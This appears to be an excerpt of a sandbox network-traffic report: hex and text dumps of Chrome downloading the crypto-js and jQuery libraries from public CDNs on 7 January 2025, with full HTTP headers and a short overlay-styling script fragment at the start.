                                                            Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.1649711104.17.24.144436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:55 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                            Host: cdnjs.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:55 UTC955INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:55 GMT
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: public, max-age=30672000
                                                            ETag: W/"61182885-40eb"
                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                            cf-cdnjs-via: cfworker/kv
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Timing-Allow-Origin: *
                                                            X-Content-Type-Options: nosniff
                                                            CF-Cache-Status: HIT
                                                            Age: 1147483
                                                            Expires: Sun, 28 Dec 2025 20:28:55 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=htfQLsI1A5ZDxOycekqDXm9st8sXem1wkdVvy6OkKtFyKD3w5Lr6prDHnFlPXQCfLq4YIvuzTh5JBpIpp7i1ROYNNce1wTduV3kLYyLX5JNLqPKUHWr%2FIiLmGX0ZGvtt6zgYBUy3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=15780000
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b26dcf8f78e8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:55 UTC414INData Raw: 37 62 66 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                            Data Ascii: 7bf6!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c
                                                            Data Ascii: obalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create|
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79
                                                            Data Ascii: (this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d
                                                            Data Ascii: t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a
                                                            Data Ascii: t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e
                                                            Data Ascii: r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74
                                                            Data Ascii: byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:funct
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54
                                                            Data Ascii: t(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRST
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68
                                                            Data Ascii: n(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._h
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d
                                                            Data Ascii: C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.1649712151.101.130.1374436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:55 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:55 UTC613INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 07 Jan 2025 20:28:55 GMT
                                                            Age: 1766261
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740028-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 1
                                                            X-Timer: S1736281735.347209,VS0,VE2
                                                            Vary: Accept-Encoding
                                                            2025-01-07 20:28:55 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-07 20:28:55 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                            2025-01-07 20:28:55 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                            2025-01-07 20:28:55 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                            2025-01-07 20:28:55 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                            2025-01-07 20:28:55 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


